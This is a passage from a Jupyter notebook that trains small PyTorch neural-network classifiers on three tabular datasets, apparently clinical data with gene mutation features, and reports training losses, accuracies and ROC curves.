"## outside validation\ntest_frame1 = pd.read_excel(new_file, sheet_name=1)\ntest_frame2 = pd.read_excel(new_file, sheet_name=3).iloc[:, range(16)]\ntest_frame3 = pd.read_excel(new_file, sheet_name=3).iloc[:, range(17,31)]",
"_____no_output_____"
],
[
"# Dataset1\nX_first = new_dataframe.iloc[:,range(0,11)]\ny_first = new_dataframe.iloc[:, -1] # 第二个指标\nX_first = np.asarray(X_first)\n\n# Dataset2\nX_second = new_dataframe1.iloc[:,range(0,15)]\ny_second = new_dataframe1.iloc[:, -1] # 第二个指标\nX_second = np.asarray(X_second)\n\n# Dataset3\nX_third = new_dataframe2.iloc[:,range(0,13)]\ny_third = new_dataframe2.iloc[:, -1] # 第二个指标\nX_third = np.asarray(X_third)",
"_____no_output_____"
],
[
"y_first = np.array(y_first)\ny_second = np.array(y_second)\ny_third = np.array(y_third)",
"_____no_output_____"
],
[
"X_train_first, X_test_first, y_train_first, y_test_first= train_test_split(X_first, y_first, test_size=0.2, random_state=100)\nX_test_first = torch.Tensor(X_test_first)\nX_train_first = torch.Tensor(X_train_first)\ny_train_first = torch.Tensor(y_train_first)\ny_test_first = torch.Tensor(y_test_first)",
"_____no_output_____"
],
[
"X_train_second, X_test_second, y_train_second, y_test_second = train_test_split(X_second, y_second, test_size=0.2, random_state=100)\nX_train_second = torch.Tensor(X_train_second)\nX_test_second = torch.Tensor(X_test_second)\ny_train_second = torch.Tensor(y_train_second)\ny_test_second = torch.Tensor(y_test_second)",
"_____no_output_____"
],
[
"X_train_third, X_test_third, y_train_third, y_test_third = train_test_split(X_third, y_third, test_size=0.2, random_state=100)\nX_train_third, X_test_third, y_train_third, y_test_third = torch.Tensor(X_train_third), torch.Tensor(X_test_third),torch.Tensor(y_train_third),torch.Tensor(y_test_third)",
"_____no_output_____"
]
],
[
[
"## ANN Training",
"_____no_output_____"
],
[
"### Model for Dataset1",
"_____no_output_____"
]
],
[
[
"class Feedforward_first(torch.nn.Module):\n def __init__(self, input_size, hidden_size):\n super(Feedforward_first, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.batchnorm = torch.nn.BatchNorm1d(self.hidden_size)\n self.laynorm = torch.nn.LayerNorm(self.input_size)\n self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size, bias=True)\n self.relu = torch.nn.ReLU()\n self.fc2 = torch.nn.Linear(self.hidden_size, 5, bias=True)\n self.relu2 = torch.nn.ReLU()\n self.fc3 = torch.nn.Linear(5, 1, bias=True)\n self.sigmoid = torch.nn.Sigmoid()\n def forward(self, x):\n hidden = self.fc1(x)\n batchnorm = self.batchnorm(hidden)\n layborm = self.batchnorm(batchnorm)\n relu = self.relu(batchnorm)\n output = self.fc2(relu)\n output = self.relu2(output)\n output = self.fc3(output)\n output = self.sigmoid(output)\n return output",
"_____no_output_____"
],
[
"X_train_first.shape[1]",
"_____no_output_____"
],
[
"model1 = Feedforward_first(X_train_first.shape[1],10)\ncriterion1 = torch.nn.BCELoss()\noptimizer1 = torch.optim.SGD(model1.parameters(), lr = 0.01, momentum=0.9, weight_decay= 0.001)",
"_____no_output_____"
],
[
"model1.train()\nepoch = 200\nloss_array = []\nfor epoch in range(epoch):\n optimizer1.zero_grad()\n # Forward pass\n y_pred = model1(X_train_first)\n # Compute Loss\n loss = criterion1(y_pred.squeeze(), y_train_first)\n loss_array.append(float(loss.item()))\n print('Epoch {}: train loss: {}'.format(epoch, loss.item()))\n # Backward pass\n loss.backward()\n optimizer1.step()",
"Epoch 0: train loss: 0.5590205192565918\nEpoch 1: train loss: 0.5586019158363342\nEpoch 2: train loss: 0.55849289894104\nEpoch 3: train loss: 0.5578608512878418\nEpoch 4: train loss: 0.5575639605522156\nEpoch 5: train loss: 0.5571672916412354\nEpoch 6: train loss: 0.5567829608917236\nEpoch 7: train loss: 0.5563794374465942\nEpoch 8: train loss: 0.556013286113739\nEpoch 9: train loss: 0.5555663704872131\nEpoch 10: train loss: 0.5553125143051147\nEpoch 11: train loss: 0.5547751188278198\nEpoch 12: train loss: 0.5544097423553467\nEpoch 13: train loss: 0.5540792942047119\nEpoch 14: train loss: 0.5536219477653503\nEpoch 15: train loss: 0.5532200336456299\nEpoch 16: train loss: 0.5529664158821106\nEpoch 17: train loss: 0.5525164008140564\nEpoch 18: train loss: 0.5520655512809753\nEpoch 19: train loss: 0.5519570112228394\nEpoch 20: train loss: 0.5513371229171753\nEpoch 21: train loss: 0.5514026284217834\nEpoch 22: train loss: 0.550910472869873\nEpoch 23: train loss: 0.550265908241272\nEpoch 24: train loss: 0.5499394536018372\nEpoch 25: train loss: 0.5496484637260437\nEpoch 26: train loss: 0.5492641925811768\nEpoch 27: train loss: 0.5486128926277161\nEpoch 28: train loss: 0.5483952164649963\nEpoch 29: train loss: 0.5480167865753174\nEpoch 30: train loss: 0.547763466835022\nEpoch 31: train loss: 0.5469951033592224\nEpoch 32: train loss: 0.5467607975006104\nEpoch 33: train loss: 0.5463106632232666\nEpoch 34: train loss: 0.546029806137085\nEpoch 35: train loss: 0.5453856587409973\nEpoch 36: train loss: 0.5455795526504517\nEpoch 37: train loss: 0.5446864366531372\nEpoch 38: train loss: 0.5447852611541748\nEpoch 39: train loss: 0.5443130135536194\nEpoch 40: train loss: 0.543426513671875\nEpoch 41: train loss: 0.5440050363540649\nEpoch 42: train loss: 0.5430793762207031\nEpoch 43: train loss: 0.5429871082305908\nEpoch 44: train loss: 0.5432665944099426\nEpoch 45: train loss: 0.5415104627609253\nEpoch 46: train loss: 0.5429471135139465\nEpoch 47: train loss: 0.5416741371154785\nEpoch 48: train loss: 0.5406892895698547\nEpoch 49: train loss: 0.5413985252380371\nEpoch 50: train loss: 0.5399373173713684\nEpoch 51: train loss: 0.5398103594779968\nEpoch 52: train loss: 0.5399395227432251\nEpoch 53: train loss: 0.5385415554046631\nEpoch 54: train loss: 0.5389920473098755\nEpoch 55: train loss: 0.538070797920227\nEpoch 56: train loss: 0.5375166535377502\nEpoch 57: train loss: 0.5373629927635193\nEpoch 58: train loss: 0.536455512046814\nEpoch 59: train loss: 0.5362730026245117\nEpoch 60: train loss: 0.5358228087425232\nEpoch 61: train loss: 0.5353663563728333\nEpoch 62: train loss: 0.5350207686424255\nEpoch 63: train loss: 0.5346797108650208\nEpoch 64: train loss: 0.534232497215271\nEpoch 65: train loss: 0.5340246558189392\nEpoch 66: train loss: 0.5335938334465027\nEpoch 67: train loss: 0.5333315134048462\nEpoch 68: train loss: 0.5328165292739868\nEpoch 69: train loss: 0.5326717495918274\nEpoch 70: train loss: 0.5321176648139954\nEpoch 71: train loss: 0.5318762063980103\nEpoch 72: train loss: 0.5314476490020752\nEpoch 73: train loss: 0.5310319066047668\nEpoch 74: train loss: 0.5310401320457458\nEpoch 75: train loss: 0.5304006338119507\nEpoch 76: train loss: 0.5303657054901123\nEpoch 77: train loss: 0.5296261310577393\nEpoch 78: train loss: 0.5296155214309692\nEpoch 79: train loss: 0.5289064645767212\nEpoch 80: train loss: 0.5288798213005066\nEpoch 81: train loss: 0.5282028317451477\nEpoch 82: train loss: 0.5282602310180664\nEpoch 83: train loss: 0.5274994969367981\nEpoch 84: train loss: 0.5273208618164062\nEpoch 85: train loss: 0.5269773006439209\nEpoch 86: train loss: 0.5265169739723206\nEpoch 87: train loss: 0.5264708399772644\nEpoch 88: train loss: 0.5258440971374512\nEpoch 89: train loss: 0.5256856679916382\nEpoch 90: train loss: 0.5252133011817932\nEpoch 91: train loss: 0.5249210000038147\nEpoch 92: train loss: 0.5245431065559387\nEpoch 93: train loss: 0.5242816209793091\nEpoch 94: train loss: 0.5239903330802917\nEpoch 95: train loss: 0.5235278606414795\nEpoch 96: train loss: 0.523310661315918\nEpoch 97: train loss: 0.5228608250617981\nEpoch 98: train loss: 0.5225307941436768\nEpoch 99: train loss: 0.5223765969276428\nEpoch 100: train loss: 0.5220914483070374\nEpoch 101: train loss: 0.5213780403137207\nEpoch 102: train loss: 0.5212794542312622\nEpoch 103: train loss: 0.5208983421325684\nEpoch 104: train loss: 0.5206651091575623\nEpoch 105: train loss: 0.5200249552726746\nEpoch 106: train loss: 0.5225282311439514\nEpoch 107: train loss: 0.5209851264953613\nEpoch 108: train loss: 0.5214298367500305\nEpoch 109: train loss: 0.5187267661094666\nEpoch 110: train loss: 0.5257800221443176\nEpoch 111: train loss: 0.519717276096344\nEpoch 112: train loss: 0.5306852459907532\nEpoch 113: train loss: 0.5267211198806763\nEpoch 114: train loss: 0.5244829058647156\nEpoch 115: train loss: 0.5300217270851135\nEpoch 116: train loss: 0.5203309655189514\nEpoch 117: train loss: 0.5315479040145874\nEpoch 118: train loss: 0.525233268737793\nEpoch 119: train loss: 0.524168074131012\nEpoch 120: train loss: 0.5291113257408142\nEpoch 121: train loss: 0.5177518725395203\nEpoch 122: train loss: 0.5315988063812256\nEpoch 123: train loss: 0.5234419107437134\nEpoch 124: train loss: 0.5238824486732483\nEpoch 125: train loss: 0.5331776738166809\nEpoch 126: train loss: 0.5212528705596924\nEpoch 127: train loss: 0.5216946601867676\nEpoch 128: train loss: 0.5227426886558533\nEpoch 129: train loss: 0.5166742205619812\nEpoch 130: train loss: 0.519821286201477\nEpoch 131: train loss: 0.5140149593353271\nEpoch 132: train loss: 0.5168339014053345\nEpoch 133: train loss: 0.5136595964431763\nEpoch 134: train loss: 0.5169833302497864\nEpoch 135: train loss: 0.512945294380188\nEpoch 136: train loss: 0.514811098575592\nEpoch 137: train loss: 0.514095664024353\nEpoch 138: train loss: 0.5143634676933289\nEpoch 139: train loss: 0.512073814868927\nEpoch 140: train loss: 0.513893187046051\nEpoch 141: train loss: 0.5117390751838684\nEpoch 142: train loss: 0.5169969797134399\nEpoch 143: train loss: 0.511292040348053\nEpoch 144: train loss: 0.5173954963684082\nEpoch 145: train loss: 0.512198805809021\nEpoch 146: train loss: 0.5174357891082764\nEpoch 147: train loss: 0.5186066627502441\nEpoch 148: train loss: 0.5096694231033325\nEpoch 149: train loss: 0.5132239460945129\nEpoch 150: train loss: 0.5105436444282532\nEpoch 151: train loss: 0.5144311189651489\nEpoch 152: train loss: 0.5097835659980774\nEpoch 153: train loss: 0.5194860100746155\nEpoch 154: train loss: 0.5124813318252563\nEpoch 155: train loss: 0.5146098136901855\nEpoch 156: train loss: 0.5163430571556091\nEpoch 157: train loss: 0.5076141953468323\nEpoch 158: train loss: 0.5165174603462219\nEpoch 159: train loss: 0.508523166179657\nEpoch 160: train loss: 0.5168237686157227\nEpoch 161: train loss: 0.5180616974830627\nEpoch 162: train loss: 0.5073416233062744\nEpoch 163: train loss: 0.523413896560669\nEpoch 164: train loss: 0.5124977827072144\nEpoch 165: train loss: 0.5161406993865967\nEpoch 166: train loss: 0.5230523943901062\nEpoch 167: train loss: 0.5095783472061157\nEpoch 168: train loss: 0.5264846682548523\nEpoch 169: train loss: 0.5151458978652954\nEpoch 170: train loss: 0.5152561664581299\nEpoch 171: train loss: 0.5291914939880371\nEpoch 172: train loss: 0.516307532787323\nEpoch 173: train loss: 0.508953869342804\nEpoch 174: train loss: 0.5199965834617615\nEpoch 175: train loss: 0.5043749809265137\nEpoch 176: train loss: 0.515712320804596\nEpoch 177: train loss: 0.5131959915161133\nEpoch 178: train loss: 0.5037013292312622\nEpoch 179: train loss: 0.51292884349823\nEpoch 180: train loss: 0.5041811466217041\nEpoch 181: train loss: 0.5100228190422058\nEpoch 182: train loss: 0.5116122961044312\nEpoch 183: train loss: 0.5090858936309814\nEpoch 184: train loss: 0.502968966960907\nEpoch 185: train loss: 0.5080538392066956\nEpoch 186: train loss: 0.5020960569381714\nEpoch 187: train loss: 0.5071541666984558\nEpoch 188: train loss: 0.5072880387306213\nEpoch 189: train loss: 0.5024657845497131\nEpoch 190: train loss: 0.5106790661811829\nEpoch 191: train loss: 0.503774881362915\nEpoch 192: train loss: 0.5075362324714661\nEpoch 193: train loss: 0.5100893378257751\nEpoch 194: train loss: 0.5050360560417175\nEpoch 195: train loss: 0.5050369501113892\nEpoch 196: train loss: 0.5045539140701294\nEpoch 197: train loss: 0.5035988092422485\nEpoch 198: train loss: 0.5053728222846985\nEpoch 199: train loss: 0.5015335083007812\n"
],
[
"plt.plot(loss_array)\nplt.title(\"Training Loss of ANN on Dataset1\")\nplt.xlabel(\"Epoches\")\nplt.ylabel(\"Loss Value\")",
"_____no_output_____"
],
[
"model1.eval()\ny_pred_first = model1(X_test_first)\ny_pred_first_int = []\n\nfor item in y_pred_first:\n y_pred_first_int.append(round(float(item[0])))\nprint(y_pred_first_int)\nprint(y_test_first)\nprint(np.sum(y_pred_first_int==np.array(y_test_first))/len(y_pred_first_int))",
"[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1]\ntensor([0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1., 0., 1., 0., 1., 1., 1.,\n 1., 1., 0., 1., 0., 1., 1., 1., 0., 1., 0., 1., 1., 1.])\n0.75\n"
],
[
"### accuracy on training set\ny_pred = model1(X_train_first)\ny_pred_int = []\n\nfor item in y_pred:\n y_pred_int.append(round(float(item[0])))\nprint(y_pred_int)\nprint(y_train_first)\nprint(np.sum(y_pred_int==np.array(y_train_first))/len(y_pred_int))",
"[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0]\ntensor([0., 0., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1.,\n 1., 0., 0., 0., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1.,\n 1., 0., 0., 1., 1., 1., 1., 1., 1., 0., 1., 0., 1., 1., 1., 1., 0., 1.,\n 1., 0., 0., 1., 0., 0., 0., 1., 1., 1., 1., 1., 0., 1., 0., 1., 1., 0.,\n 1., 1., 0., 1., 1., 1., 1., 0., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1.,\n 1., 0., 1., 1., 1., 1., 0., 1., 0., 0., 1., 1., 0., 1., 1., 1., 1., 1.,\n 1., 1., 1., 0., 0., 0., 1., 0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1.])\n0.7222222222222222\n"
],
[
"### ROC and AUC for ANN1\n\ny_label = y_test_first.int().tolist() # 非二进制需要pos_label\ny_pre = y_pred_first_int\nprint(y_label)\nprint(y_pre)\nfpr1, tpr1, thersholds1 = roc_curve(y_label, y_pre, pos_label=1)\nfpr2, tpr2, thersholds2 = roc_curve(y_test_second, y_pred_second_int, pos_label=1)\nfpr3, tpr3, thersholds3 = roc_curve(y_test_third, y_pred_third_int, pos_label=1)\n\n\n \n# for i, value in enumerate(thersholds):\n# print(\"%f %f %f\" % (fpr[i], tpr[i], value))\n \nroc_auc1 = auc(fpr1, tpr1)\nroc_auc2 = auc(fpr2, tpr2)\nroc_auc3 = auc(fpr3, tpr3)\n \nplt.plot(fpr1, tpr1, 'k--', label='ROC (area = {0:.2f}) without Gene Sequence'.format(roc_auc1), lw=2, color='b')\nplt.plot(fpr2, tpr2, 'k--', label='ROC (area = {0:.2f}) with TB53,rb1 and pik3ca'.format(roc_auc2), lw=2, color='r')\nplt.plot(fpr3, tpr3, 'k--', label='ROC (area = {0:.2f}) with Number of Mutated Genes'.format(roc_auc3), lw=2, color='g')\n\n \nplt.xlim([-0.05, 1.05]) # 设置x、y轴的上下限,以免和边缘重合,更好的观察图像的整体\nplt.ylim([-0.05, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate') # 可以使用中文,但需要导入一些库即字体\nplt.title('ROC Curves of ANN')\nplt.legend(loc=\"lower right\")",
"[0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1]\n[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1]\n"
]
],
[
[
"### Model for Dataset2",
"_____no_output_____"
]
],
[
[
"class Feedforward_second(torch.nn.Module):\n def __init__(self, input_size, hidden_size):\n super(Feedforward_second, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.batchnorm = torch.nn.BatchNorm1d(self.input_size)\n self.laynorm = torch.nn.LayerNorm(self.input_size)\n self.fc1 = torch.nn.Linear(self.input_size, self.hidden_size, bias=True)\n self.relu = torch.nn.ReLU()\n self.fc2 = torch.nn.Linear(self.hidden_size, 5, bias=True)\n self.fc3 = torch.nn.Linear(5, 1, bias=True)\n self.sigmoid = torch.nn.Sigmoid()\n def forward(self, x):\n hidden = self.fc1(x)\n batchnorm = self.batchnorm(hidden)\n laynorm = self.laynorm(batchnorm)\n relu = self.relu(laynorm)\n output = self.fc2(relu)\n output = self.fc3(output)\n output = self.sigmoid(output)\n return output",
"_____no_output_____"
],
[
"X_train_second",
"_____no_output_____"
],
[
"model2 = Feedforward_second(X_train_second.shape[1],15)\ncriterion2 = torch.nn.BCELoss()\noptimizer2 = torch.optim.Adam(model2.parameters(), lr = 0.01, weight_decay= 0.001)",
"_____no_output_____"
],
[
"model2.train()\nepoch = 200\nloss_array = []\nfor epoch in range(epoch):\n optimizer2.zero_grad()\n # Forward pass\n y_pred = model2(X_train_second)\n # Compute Loss\n loss = criterion2(y_pred.squeeze(), y_train_second)\n loss_array.append(float(loss.item()))\n print('Epoch {}: train loss: {}'.format(epoch, loss.item()))\n # Backward pass\n loss.backward()\n optimizer2.step()",
"Epoch 0: train loss: 0.6052454710006714\nEpoch 1: train loss: 0.5969358086585999\nEpoch 2: train loss: 0.5904589891433716\nEpoch 3: train loss: 0.584665060043335\nEpoch 4: train loss: 0.579624354839325\nEpoch 5: train loss: 0.572795033454895\nEpoch 6: train loss: 0.5640113949775696\nEpoch 7: train loss: 0.5548313856124878\nEpoch 8: train loss: 0.5458484292030334\nEpoch 9: train loss: 0.5364435315132141\nEpoch 10: train loss: 0.5238454937934875\nEpoch 11: train loss: 0.5097098350524902\nEpoch 12: train loss: 0.4956801235675812\nEpoch 13: train loss: 0.48102617263793945\nEpoch 14: train loss: 0.4656539559364319\nEpoch 15: train loss: 0.4511193335056305\nEpoch 16: train loss: 0.4363560974597931\nEpoch 17: train loss: 0.42070847749710083\nEpoch 18: train loss: 0.4050501585006714\nEpoch 19: train loss: 0.3906722068786621\nEpoch 20: train loss: 0.3784583508968353\nEpoch 21: train loss: 0.368916392326355\nEpoch 22: train loss: 0.3594647943973541\nEpoch 23: train loss: 0.3484821021556854\nEpoch 24: train loss: 0.33943334221839905\nEpoch 25: train loss: 0.3335486054420471\nEpoch 26: train loss: 0.3257678747177124\nEpoch 27: train loss: 0.31837499141693115\nEpoch 28: train loss: 0.3114306330680847\nEpoch 29: train loss: 0.304557204246521\nEpoch 30: train loss: 0.29661262035369873\nEpoch 31: train loss: 0.2895645797252655\nEpoch 32: train loss: 0.2818766236305237\nEpoch 33: train loss: 0.2724047005176544\nEpoch 34: train loss: 0.26493412256240845\nEpoch 35: train loss: 0.25809168815612793\nEpoch 36: train loss: 0.25092288851737976\nEpoch 37: train loss: 0.2449619472026825\nEpoch 38: train loss: 0.2377459704875946\nEpoch 39: train loss: 0.23008576035499573\nEpoch 40: train loss: 0.22217820584774017\nEpoch 41: train loss: 0.21620342135429382\nEpoch 42: train loss: 0.2071414291858673\nEpoch 43: train loss: 0.199288472533226\nEpoch 44: train loss: 0.19183333218097687\nEpoch 45: train loss: 0.18506427109241486\nEpoch 46: train loss: 0.17897669970989227\nEpoch 47: train loss: 0.1730639785528183\nEpoch 48: train loss: 0.16774125397205353\nEpoch 49: train loss: 0.15852828323841095\nEpoch 50: train loss: 0.15396912395954132\nEpoch 51: train loss: 0.1479717493057251\nEpoch 52: train loss: 0.13901352882385254\nEpoch 53: train loss: 0.13643009960651398\nEpoch 54: train loss: 0.1269584447145462\nEpoch 55: train loss: 0.12238290905952454\nEpoch 56: train loss: 0.11412519216537476\nEpoch 57: train loss: 0.10970237106084824\nEpoch 58: train loss: 0.10409706830978394\nEpoch 59: train loss: 0.09902621805667877\nEpoch 60: train loss: 0.09457860141992569\nEpoch 61: train loss: 0.08964154869318008\nEpoch 62: train loss: 0.08635799586772919\nEpoch 63: train loss: 0.08193625509738922\nEpoch 64: train loss: 0.07843025028705597\nEpoch 65: train loss: 0.07399163395166397\nEpoch 66: train loss: 0.07113555073738098\nEpoch 67: train loss: 0.06684628874063492\nEpoch 68: train loss: 0.06305428594350815\nEpoch 69: train loss: 0.05958578735589981\nEpoch 70: train loss: 0.05602429434657097\nEpoch 71: train loss: 0.051782943308353424\nEpoch 72: train loss: 0.047671470791101456\nEpoch 73: train loss: 0.04403860867023468\nEpoch 74: train loss: 0.04078907147049904\nEpoch 75: train loss: 0.03797098621726036\nEpoch 76: train loss: 0.03513307124376297\nEpoch 77: train loss: 0.03270452469587326\nEpoch 78: train loss: 0.030219603329896927\nEpoch 79: train loss: 0.027843289077281952\nEpoch 80: train loss: 0.025676794350147247\nEpoch 81: train loss: 0.02372279018163681\nEpoch 82: train loss: 0.022016892209649086\nEpoch 83: train loss: 0.020494308322668076\nEpoch 84: train loss: 0.018974902108311653\nEpoch 85: train loss: 0.017689315602183342\nEpoch 86: train loss: 0.016454746946692467\nEpoch 87: train loss: 0.015370991080999374\nEpoch 88: train loss: 0.014367111027240753\nEpoch 89: train loss: 0.013457266613841057\nEpoch 90: train loss: 0.012592986226081848\nEpoch 91: train loss: 0.011884567327797413\nEpoch 92: train loss: 0.011192206293344498\nEpoch 93: train loss: 0.010564757511019707\nEpoch 94: train loss: 0.009898116812109947\nEpoch 95: train loss: 0.00940116960555315\nEpoch 96: train loss: 0.008856242522597313\nEpoch 97: train loss: 0.00838000513613224\nEpoch 98: train loss: 0.007945524528622627\nEpoch 99: train loss: 0.007497259881347418\nEpoch 100: train loss: 0.007162530440837145\nEpoch 101: train loss: 0.006818610243499279\nEpoch 102: train loss: 0.0065324255265295506\nEpoch 103: train loss: 0.00619979714974761\nEpoch 104: train loss: 0.0059780701994895935\nEpoch 105: train loss: 0.005765127949416637\nEpoch 106: train loss: 0.005560785066336393\nEpoch 107: train loss: 0.005371598061174154\nEpoch 108: train loss: 0.005205294582992792\nEpoch 109: train loss: 0.005071834195405245\nEpoch 110: train loss: 0.004897171165794134\nEpoch 111: train loss: 0.004784705583006144\nEpoch 112: train loss: 0.004667376633733511\nEpoch 113: train loss: 0.004537016618996859\nEpoch 114: train loss: 0.004441241733729839\nEpoch 115: train loss: 0.004352880641818047\nEpoch 116: train loss: 0.004259277600795031\nEpoch 117: train loss: 0.00416290108114481\nEpoch 118: train loss: 0.004054964054375887\nEpoch 119: train loss: 0.003963435534387827\nEpoch 120: train loss: 0.0038792123086750507\nEpoch 121: train loss: 0.003809853922575712\nEpoch 122: train loss: 0.003747938433662057\nEpoch 123: train loss: 0.003696975763887167\nEpoch 124: train loss: 0.0036320772487670183\nEpoch 125: train loss: 0.0035689377691596746\nEpoch 126: train loss: 0.0035274995025247335\nEpoch 127: train loss: 0.003470861352980137\nEpoch 128: train loss: 0.003433588659390807\nEpoch 129: train loss: 0.0033979653380811214\nEpoch 130: train loss: 0.0033710896968841553\nEpoch 131: train loss: 0.003332283813506365\nEpoch 132: train loss: 0.0032996099907904863\nEpoch 133: train loss: 0.0032811418641358614\nEpoch 134: train loss: 0.0032510515302419662\nEpoch 135: train loss: 0.0032257793936878443\nEpoch 136: train loss: 0.003209572285413742\nEpoch 137: train loss: 0.0031971586868166924\nEpoch 138: train loss: 0.0031769326888024807\nEpoch 139: train loss: 0.003176722675561905\nEpoch 140: train loss: 0.0031492789275944233\nEpoch 141: train loss: 0.003143546637147665\nEpoch 142: train loss: 0.003124909708276391\nEpoch 143: train loss: 0.003143055597320199\nEpoch 144: train loss: 0.00314461556263268\nEpoch 145: train loss: 0.003129849676042795\nEpoch 146: train loss: 0.0031336424872279167\nEpoch 147: train loss: 0.0031024152413010597\nEpoch 148: train loss: 0.0031168144196271896\nEpoch 149: train loss: 0.0030993421096354723\nEpoch 150: train loss: 0.0031011654064059258\nEpoch 151: train loss: 0.0030854507349431515\nEpoch 152: train loss: 0.003076585941016674\nEpoch 153: train loss: 0.003074432723224163\nEpoch 154: train loss: 0.0030587250366806984\nEpoch 155: train loss: 0.0030573117546737194\nEpoch 156: train loss: 0.003055980196222663\nEpoch 157: train loss: 0.003031747182831168\nEpoch 158: train loss: 0.0030324955005198717\nEpoch 159: train loss: 0.0030291108414530754\nEpoch 160: train loss: 0.00299970549531281\nEpoch 161: train loss: 0.0029882187955081463\nEpoch 162: train loss: 0.0030813824851065874\nEpoch 163: train loss: 0.0031573663000017405\nEpoch 164: train loss: 0.003080239985138178\nEpoch 165: train loss: 0.003136890707537532\nEpoch 166: train loss: 0.0034634305629879236\nEpoch 167: train loss: 0.0030878926627337933\nEpoch 168: train loss: 0.003239982295781374\nEpoch 169: train loss: 0.003200431587174535\nEpoch 170: train loss: 0.0031227373983711004\nEpoch 171: train loss: 0.0031185420230031013\nEpoch 172: train loss: 0.0030704373493790627\nEpoch 173: train loss: 0.0029332146514207125\nEpoch 174: train loss: 0.0030170355457812548\nEpoch 175: train loss: 0.0028758137486875057\nEpoch 176: train loss: 0.002940699690952897\nEpoch 177: train loss: 0.0028413222171366215\nEpoch 178: train loss: 0.0029179120901972055\nEpoch 179: train loss: 0.0027829469181597233\nEpoch 180: train loss: 0.002895570592954755\nEpoch 181: train loss: 0.0027690043207257986\nEpoch 182: train loss: 0.002795223379507661\nEpoch 183: train loss: 0.0027387402951717377\nEpoch 184: train loss: 0.0027281742077320814\nEpoch 185: train loss: 0.00273157749325037\nEpoch 186: train loss: 0.002737649017944932\nEpoch 187: train loss: 0.002689948072656989\nEpoch 188: train loss: 0.0026536895893514156\nEpoch 189: train loss: 0.0026807847898453474\nEpoch 190: train loss: 0.0026659953873604536\nEpoch 191: train loss: 0.0026901597157120705\nEpoch 192: train loss: 0.002629604423418641\nEpoch 193: train loss: 0.0026427379343658686\nEpoch 194: train loss: 0.002647355431690812\nEpoch 195: train loss: 0.0026274556294083595\nEpoch 196: train loss: 0.0026420254725962877\nEpoch 197: train loss: 0.002602399792522192\nEpoch 198: train loss: 0.0026064766570925713\nEpoch 199: train loss: 0.0026184143498539925\n"
],
[
"torch.save(model2, \"ann_model.pt\")",
"_____no_output_____"
],
[
"plt.plot(loss_array)\nplt.title(\"Training Loss of ANN on Dataset2\")\nplt.xlabel(\"Epoches\")\nplt.ylabel(\"Loss Value\")",
"_____no_output_____"
],
[
"model2.eval()\ny_pred_second = model2(X_test_second)\ny_pred_second_int = []\n\nfor item in y_pred_second:\n y_pred_second_int.append(round(float(item[0])))\nprint(y_pred_second_int)\nprint(y_test_second)\nprint(np.sum(y_pred_second_int==np.array(y_test_second))/len(y_test_second))",
"[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1]\ntensor([0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 1., 1., 0., 1., 0., 1., 1., 1.,\n 1., 1., 0., 1., 0., 1., 1., 1., 0., 1., 0., 1., 1., 1.])\n0.8125\n"
],
[
"### accuracy on training set\ny_pred = model2(X_train_second)\ny_pred_int = []\n\nfor item in y_pred:\n y_pred_int.append(round(float(item[0])))\nprint(y_pred_int)\nprint(y_train_second)\nprint(np.sum(y_pred_int==np.array(y_train_second))/len(y_pred_int))",
